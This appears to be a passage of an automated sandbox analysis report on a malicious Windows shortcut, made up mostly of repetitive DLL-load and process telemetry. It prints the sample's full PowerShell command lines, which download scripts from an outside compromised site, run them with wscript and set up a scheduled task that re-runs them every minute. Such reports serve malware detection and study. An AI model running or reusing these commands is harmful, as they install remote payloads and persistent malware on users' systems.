      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
      Source: yT6gJFN0SR.lnkLNK file: ..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: C:\Windows\System32\wscript.exeAutomated click: OK
      Source: C:\Windows\System32\wscript.exeAutomated click: OK
      Source: C:\Windows\System32\wscript.exeAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

      Data Obfuscation

      barindex
      Suspicious powershell command line found
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC7A0953 push E95B2FD0h; ret 0_2_00007FFAAC7A09C9

      Persistence and Installation Behavior

      barindex
      Windows shortcut file (LNK) starts blacklisted processes
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Tries to download and execute files (via powershell)
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;

      Boot Survival

      barindex
      Uses schtasks.exe or at.exe to add and modify task schedules
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
